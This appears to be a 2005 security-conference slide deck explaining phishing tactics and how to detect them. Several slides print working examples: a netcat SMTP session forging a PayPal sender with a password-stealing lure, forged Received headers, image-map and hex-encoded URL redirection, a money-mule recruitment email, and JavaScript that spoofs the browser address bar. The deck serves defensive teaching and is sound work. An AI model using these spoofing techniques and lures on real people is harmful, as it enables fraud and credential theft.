A Primer on Phishing Tactics

Practical Counter-Fraud SolutionsPractical Counter-Fraud Solutions

2

Introduction

About Me:

Tod Beardsley, todb@planb-security.netEmployed at TippingPoint, a division of 3comLead Counter-Fraud Engineer

About Phishing:• Massive growth over the last 18 months.• ChoicePoint and Lexus-Nexus hacks are great targets, but

0wning your mom’s bridge friends is a lot easier.• Very effective at convincing said mom’s friends.

3

The Lure

4

The Catch

5

The Catch continued

6

Profit!

• So now what? Enter the money mules:

Dear Future Employee,We have received your contact information from employment agency.My name is Karl Jorgensen, project coordinator and your directsupervisor at Odono Inc. Please read the information below aboutour company and your job description.

Odono Inc. leader in wholesale produce distribution is looking forresponsible individuals to be responsible for the areas of shipping operations, customer service, transaction and bank operations.

Current openings: Transaction ManagerYou will receive transfers for our company, send/receive funds.You should have your local bank branch locating near you,so you can withdraw money from your account within several hours.You should have home, work or cell phone number (preferably), so we can contact you immediately.

Requirements:* Be able to check your email several times a day* Be able to respond to emails immediately* Be able to work overtime if needed* Be responsible and hard working

If you are interested in this position and meet the minimum requirements please visit and register here:

http://www.odono.org/jobs.html

7

E-Mail Trust Building Tactics

• Between two and five percent of phishing e-mail is responded to.

• Several thousand e-mail addresses are used in a given campaign.

• Compare to spam: a typical, successful run of millions of addresses generate a rate of %0.01 or so click throughs.

• Phishing click-throughs are qaulified – once hooked, they almost always provide information to the attacker.

8

E-mail: Forging From Fields

• Very complicated task… well, not really.C:\>nc mail.cox-internet.com 25220 jupiter ESMTP server (InterMail vK.4.04.00.03 201-232-140-20030416 license fe37ca4dbd17753103b2892ad5fc6c09) ready Sat, 4 Jun 2005 02:18:24 -0500HELO paypal.com250 fe4.cox-internet.comMAIL From: accounts@paypal.com250 Sender <accounts@paypal.com> OkRCPT To: victim@example.com250 Recipient <victim@example.com> OkDATA354 Ok Send data ending with <CRLF>.<CRLF>

Dear Valued Customer,

Due to a problem with our servers, you need to give us yourpassword right away. Please click here:

http://www.paypalk.com

Thank you for your continued patronage..250 Message received: 20050604071934.TGZA4425.fe4@paypal.comQUIT221 fe4.cox-internet.com ESMTP server closing connection

C:\>

9

E-mail: Forging Received Fields

A normal Received path:

Received: (qmail 48182 invoked from network); 18 May 2005 15:46:48 -0000Received: from outbound2.den.paypal.com (216.113.188.112) by mail.example.com with SMTP; 18 May 2005 15:46:48 -0000Received: from denweb159.den.paypal.com (denweb159.den.paypal.com [10.191.12.207])

by outbound2.den.paypal.com (Postfix) with SMTP id A9CAC11802Cfor <customer@example.com>; Wed, 18 May 2005 08:46:47 -0700 (PDT)

Received: (qmail 6332 invoked by uid 99); 18 May 2005 15:46:47 -0000

A Slightly Altered Received path:

Received: (qmail 68233 invoked from network); 2 Jun 2005 09:36:47 -0000Received: from s01060010dcf9b811.vc.shawcable.net (24.81.25.151) by mail.example.com with SMTP; 2 Jun 2005 09:36:47 -0000Received: from paypal.com (smtp1.sc5.paypal.com [64.4.244.74])

by S01060010dcf9b811.vc.shawcable.net with esmtpid ABEFBBB123 for <ageddyn@minitru.org>; Thu, 02 Jun 2005 09:36:35 -0700

10

E-mail: Evading Anti-Spam

• Looks like a regular message…

11

E-mail: Evading Anti-Spam

• But it’s really an inline GIF. Trickiness.

This is a multi-part message in MIME format.--------------060608080401000901030005Content-Type: text/html; charset=us-asciiContent-Transfer-Encoding: 7bit

<html><p><font face="Arial"><A HREF="https://www.southtrust.com/st/PersonalBanking/custdetailsconfirmation"><map name="rtaiz"><area coords="0, 0, 597, 355" shape="rect" href="http://comannd.com:280"></map><img SRC="cid:part1.07060107.05040003@custservice_id_6142187@southtrust.com" border="0" usemap="#rtaiz"></A></a></font></p><p><font color="#FFFFF0">Tennis Warner Bross Alyssa Milano XFL Cheerleaders Metallica </font></p></html>

--------------060608080401000901030005Content-Type: image/gif; name="bergman.GIF"Content-Transfer-Encoding: base64Content-ID: <part1.07060107.05040003@custservice_id_6142187@southtrust.com>Content-Disposition: inline; filename="bergman.GIF"

R0lGODlhYgJrAfOFAAUIAKbK8ICAgABgwACAwCCAwECAwECgwGCgwICgwIDAwP/78AAA/////wAAAAAAACH5BAQAAAAALAAAAABVAmMBAAT/sMlJq7046827/2AojmRpnmiqrmzrvnAsz3Rt33iu73zv/8CgcEgsGo/IpHLJbDqf0Kh0Sq1ar9isdsvter+dhXhMLpvFgYACQQC73/C4/BpAFAiDvH7P7/fngIGCg4QxAQV+[…]

12

E-Mail: Misdirection and Redirection

• Crafted “Automatically generated” links<A HREF="http://222.82.252.206/SouthTrust/">https://www.suntrust.com/update/</A>

• Hex-Encoded URLs

http://%32%31%30.%32%31%39%2e%32%34%31%2e%31%32%35/%69%6d%61%67%65%73/paypal/cgi-bin/webscrcmd_login.php

http://210.219.241.125/images/paypal/cgi-bin/webscrcmd_login.php

• Overlapping Area Map Tags<A HREF="https://www.southtrust.com/st/PersonalBanking/custdetailsconfirmation"><map name="rtaiz"><area coords="0, 0, 597, 355" shape="rect" href="http://comannd.com:280"></map>

• Open Redirection Services<A HREF="https://www.southtrust.com/st/PersonalBanking/custdetailsconfirmation"><map name="rtaiz"><area coords="0, 0, 597, 355" shape="rect" href="http://comannd.com:280"></map>

13

E-Mail: Misdirection and Redirection continued

• Obfuscation Services

14

E-Mail: Cutting Out the Web Site Entirely

15

Detecting Phishy Links

Best and most Draconian:• No HTML rendered e-mail, ever.

More realistic:• No hex-encoded printable ASCII characters in domain names

• No HTTP link containing “http” more than once.

• No nested <A> and <AREA> links.

• Correlate obfuscation techniques to From addresses.

Is there some reason anti-spam can’t handle this already?

16

Web Site Trust Building

• Once you’re on the page, you’re pretty much compelled to execute.

• Pages today are much more cookie-cutter than their e-mail lures.

• Sometimes pages don’t match up with the bank; How significant is this?

• The pages themselves may suck, but the exploits being used to control the web servers… well they kind of suck too.

17

The Magic of Copy and Paste

• Yes, quite magical. File | Save As | Upload | Done.

• Typically the only elements that need touching are perhaps the image locations, some of the javascript source files, and redirect the <FORM> to your PHP form mailer.

• Many leave traces of their copying:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><!-- saved from url=(0036)http://secure.netbank.com/login.htm --><HTML><HEAD><TITLE>NetBank Account Login</TITLE>

18

window.createPopup

var vuln_x, vuln_y, vuln_w, vuln_h;function vuln_calc() {var root= document[(document.compatMode=='CSS1Compat') ?'documentElement' : 'body'];vuln_x= window.screenLeft+72;vuln_y= window.screenTop-20;vuln_w= root.offsetWidth-520;vuln_h= 17;vuln_show();}

var vuln_win;function vuln_pop() {vuln_win= window.createPopup();vuln_win.document.body.innerHTML= vuln_html;vuln_win.document.body.style.margin= 0;vuln_win.document.body.onunload= vuln_pop;vuln_show();}

function vuln_show() {if (vuln_win)vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h);}

var vuln_html= '<div style="height: 100%; line-height: 17px;font-family: \'Tahoma\', sans-serif; font-size:8pt;">https://www.usbank.com/secure/-run</div>

19

window.createPopup continued

20

window.createPopup continued

Presto Change-o

But why bother?• Many sites incorporate this code, probably just due to cookie-cutter

practices.

• The victims of phishing don’t usually qualify the sites they visit off the Location Bar anyway, or anything else in the browser.

21

Signed, Sealed… Who Cares?

Thank you, Verisign!

A more obvious and much easier to forge security seal.

22

Verisign Spoofery Continued

23

Conclusions

• It is silly to think that users will take care of themselves. A decade of wildly successful spam campaigns prove this. (75% of all Internet e-mail is junk mail today.)

• The only reason why people notice phishing is because traditional anti-spam has failed to catch it – partly because the keywords are already in everyone’s “known good” set, and because people whitelist e-mail from their banks.

• The overmarketing and near total lack of understanding of SSL is also partly to blame. Browsers are terrible at preventing this out of the box, and this is one thing they ought to be good at.

• A billion dollars a year of capital flight kind of sucks, and it’s probably more.

• Not all phishers are ID10Ts. Some use very advanced techniques, write effective malware, and deploy very complex networks of SMTP and HTTP relays to conduct their business.

Thank Youtodb@planb-security.net